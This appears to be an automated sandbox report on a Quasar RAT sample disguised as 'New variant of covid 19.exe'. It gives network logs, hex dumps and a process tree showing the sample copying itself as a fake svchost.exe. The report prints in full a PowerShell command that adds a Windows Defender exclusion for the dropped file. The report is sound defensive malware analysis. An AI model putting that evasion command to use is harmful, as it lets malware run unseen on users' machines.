                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" hre
                                                                        Mar 9, 2021 22:19:23.169635057 CET9181OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:23.385524035 CET9183INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:23 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d2230e2290a747efdd31bc1e7be1c1b8a1615324763; expires=Thu, 08-Apr-21 21:19:23 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:15 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74ec410000c27713874000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=11C2K0ApXb9PVdsJzfnrbD4kIuB65zwQ71xaMAyd15prFTG2t7%2BAvcYyyBuZuotTb2dYWKX%2BJKXJGJDpi0Y2JaT0dYQ6JaMYxbr2%2BewjXB4kMYTB9jgH4w%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d7575a0836c277-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect"
                                                                        Mar 9, 2021 22:19:30.728245020 CET10488OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:30.942941904 CET10489INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=dbd757233c3565ddd8d21ad4ff634d5161615324770; expires=Thu, 08-Apr-21 21:19:30 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:17 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba7509c50000c27717115000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2B%2FSNKcKlq2%2F%2F5N%2B3BmNJnIirp96AZz19osN4Nq6JTNLRDpaRZMzkEv9r%2Bc6NMUR8acjDv8ReE%2FtbWLLL5ee0M5WoGf50wALXScncU22M3fmfbgTEVUtFTA%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757893fddc277-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="pre


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: New variant of covid 19.exe PID: 6372 Parent PID: 5684

                                                                        General

                                                                        Start time:22:18:39
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\New variant of covid 19.exe'
                                                                        Imagebase:0xf20000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low

                                                                        Analysis Process: svchost.exe PID: 6692 Parent PID: 568

                                                                        General

                                                                        Start time:22:18:46
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: powershell.exe PID: 6864 Parent PID: 6372

                                                                        General

                                                                        Start time:22:18:53
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
                                                                        Imagebase:0x920000
                                                                        File size:430592 bytes
                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6872 Parent PID: 6864

                                                                        General

                                                                        Start time:22:18:53
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: cmd.exe PID: 6884 Parent PID: 6372

                                                                        General

                                                                        Start time:22:18:54
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                        Imagebase:0xbd0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6960 Parent PID: 6884

                                                                        General

                                                                        Start time:22:18:54
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: timeout.exe PID: 7008 Parent PID: 6884

                                                                        General

                                                                        Start time:22:18:55
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:timeout 1
                                                                        Imagebase:0x810000
                                                                        File size:26112 bytes
                                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: New variant of covid 19.exe PID: 7152 Parent PID: 6372

                                                                        General

                                                                        Start time:22:18:57
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Imagebase:0xcd0000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Analysis Process: WerFault.exe PID: 5488 Parent PID: 6372

                                                                        General

                                                                        Start time:22:18:59
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956
                                                                        Imagebase:0xe10000
                                                                        File size:434592 bytes
                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        Analysis Process: explorer.exe PID: 6132 Parent PID: 3388

                                                                        General

                                                                        Start time:22:19:05
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: explorer.exe PID: 6156 Parent PID: 792

                                                                        General

                                                                        Start time:22:19:07
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: svchost.exe PID: 6460 Parent PID: 6156

                                                                        General

                                                                        Start time:22:19:08
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x1d0000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low

                                                                        Analysis Process: svchost.exe PID: 6568 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:09
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: explorer.exe PID: 6964 Parent PID: 3388

                                                                        General

                                                                        Start time:22:19:15
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: explorer.exe PID: 7112 Parent PID: 792

                                                                        General

                                                                        Start time:22:19:16
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: svchost.exe PID: 6988 Parent PID: 7112

                                                                        General

                                                                        Start time:22:19:17
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x630000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low

                                                                        Analysis Process: svchost.exe PID: 5652 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:19
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: svchost.exe PID: 4144 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:20
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 1240 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:21
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 5820 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:21
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 6628 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:22
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 4952 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:22
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                        Imagebase:0x7ff6f6180000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 7032 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:24
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 3596 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:26
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 5320 Parent PID: 568

                                                                        General

                                                                        Start time:22:19:38
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: powershell.exe PID: 6552 Parent PID: 6460

                                                                        General

                                                                        Start time:22:19:40
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
                                                                        Imagebase:0xfc0000
                                                                        File size:430592 bytes
                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET

                                                                        Analysis Process: conhost.exe PID: 4616 Parent PID: 6552

                                                                        General

                                                                        Start time:22:19:41
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: cmd.exe PID: 3440 Parent PID: 6460

                                                                        General

                                                                        Start time:22:19:41
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                        Imagebase:0x40000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: conhost.exe PID: 5408 Parent PID: 3440

                                                                        General

                                                                        Start time:22:19:41
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: timeout.exe PID: 5888 Parent PID: 3440

                                                                        General

                                                                        Start time:22:19:41
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:timeout 1
                                                                        Imagebase:0xc80000
                                                                        File size:26112 bytes
                                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: svchost.exe PID: 1488 Parent PID: 6460

                                                                        General

                                                                        Start time:22:19:44
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Imagebase:0x370000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Disassembly

                                                                        Code Analysis

